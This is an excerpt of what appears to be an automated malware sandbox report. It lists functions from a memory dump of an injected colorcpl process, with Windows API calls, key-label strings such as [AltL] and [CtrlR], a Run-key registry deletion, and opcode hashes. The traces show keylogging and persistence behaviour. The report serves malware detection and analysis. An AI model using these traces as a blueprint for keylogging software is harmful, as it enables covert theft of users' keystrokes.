                                                              APIs
                                                              • GetKeyState.USER32(00000011), ref: 0309A597
                                                                • Part of subcall function 03099468: GetForegroundWindow.USER32(03102008,?,03102008), ref: 0309949C
                                                                • Part of subcall function 03099468: GetWindowThreadProcessId.USER32(00000000,?), ref: 030994A7
                                                                • Part of subcall function 03099468: GetKeyboardLayout.USER32(00000000), ref: 030994AE
                                                                • Part of subcall function 03099468: GetKeyState.USER32(00000010), ref: 030994B8
                                                                • Part of subcall function 03099468: GetKeyboardState.USER32(?), ref: 030994C5
                                                                • Part of subcall function 03099468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 030994E1
                                                                • Part of subcall function 0309962E: SetEvent.KERNEL32(?,?,?,0309A77B,?,?,?,?,?,00000000), ref: 0309965A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                              • String ID: [AltL]$[AltR]
                                                              • API String ID: 3195419117-2658077756
                                                              • Opcode ID: fbb9deb96de5bb0635d5a6127706a9bd0283251634506a566287fbbc885aecb2
                                                              • Instruction ID: 5cd4f78bf207b6fdb0f666f3308ec8c28f4a281daa9fd66b33ddebe7caeafaf2
                                                              • Opcode Fuzzy Hash: fbb9deb96de5bb0635d5a6127706a9bd0283251634506a566287fbbc885aecb2
                                                              • Instruction Fuzzy Hash: 30E02B253033201BEC69B23D292A5FCB93487C2970B80004FE9824F985DD554D0063C6
                                                              Function 0309A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyState.USER32(00000012), ref: 0309A5F1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: State
                                                              • String ID: [CtrlL]$[CtrlR]
                                                              • API String ID: 1649606143-2446555240
                                                              • Opcode ID: b85d04628ee45c224e2b181487af7ea36324b310b7ac4826ad073282ee8f2d8e
                                                              • Instruction ID: ac398ccf568bdb45f7abb7276a4b2536df7f25edf721f7381ca479a7b6c40851
                                                              • Opcode Fuzzy Hash: b85d04628ee45c224e2b181487af7ea36324b310b7ac4826ad073282ee8f2d8e
                                                              • Instruction Fuzzy Hash: B6E07D317073111FEC14F57D651A67C7C9887C28F4F02008BEC428F886CC47850123C2
                                                              Function 030A2414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,031021E8,80000002,80000002,0309BD02,00000000,?,03102200,pth_unenc,031021E8), ref: 030A2422
                                                              • RegDeleteValueW.ADVAPI32(031021E8,?,?,03102200,pth_unenc,031021E8), ref: 030A2436
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 030A2420
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteOpenValue
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                              • API String ID: 2654517830-1051519024
                                                              • Opcode ID: ccb04d5ab7f125434cce13edd1769a7d4bd9165da92d558bbd0c1b73319251a3
                                                              • Instruction ID: e780d242663d424ce7c382e603c0cce70cdb5bdb02e6ad20daa12ffddec9b5ee
                                                              • Opcode Fuzzy Hash: ccb04d5ab7f125434cce13edd1769a7d4bd9165da92d558bbd0c1b73319251a3
                                                              • Instruction Fuzzy Hash: B7E0C23124520CBBDF10AFB1ED07FBE7B6CDB01F01F0046A5BD0596880C7279A149660
                                                              Function 030CB445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,03091D35), ref: 030CB4DB
                                                              • GetLastError.KERNEL32 ref: 030CB4E9
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 030CB544
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: 49dd4d15eea7a661501da13640a2452bfbf0990d85a0fb91bc6d1d289d16d07f
                                                              • Instruction ID: 6f6937293215e3c04b358dff06447f5e75d6881349e30c78c69337566b1af035
                                                              • Opcode Fuzzy Hash: 49dd4d15eea7a661501da13640a2452bfbf0990d85a0fb91bc6d1d289d16d07f
                                                              • Instruction Fuzzy Hash: B4410630622295AFDB61DF64D845BBEBBE8EF41320F18429CE855AB2A6DB31C900C750
                                                              Function 030A05C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 030A05F1
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 030A06BD
                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 030A06DF
                                                              • SetLastError.KERNEL32(0000007E,030A0955), ref: 030A06F6
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastRead
                                                              • String ID:
                                                              • API String ID: 4100373531-0
                                                              • Opcode ID: 753f6eae09332f791abe804d671f69f7bd40ed25fc238e5a9b01044c5b4a7f9f
                                                              • Instruction ID: d79188c760e043ecb5db35ba92fa5483554e8787091dbfc3db180c8e20e8f747
                                                              • Opcode Fuzzy Hash: 753f6eae09332f791abe804d671f69f7bd40ed25fc238e5a9b01044c5b4a7f9f
                                                              • Instruction Fuzzy Hash: 9B419D7164570A9FEB20CF98EC84B26B7E8FF84708F04482DE546C6651EB71E804CB11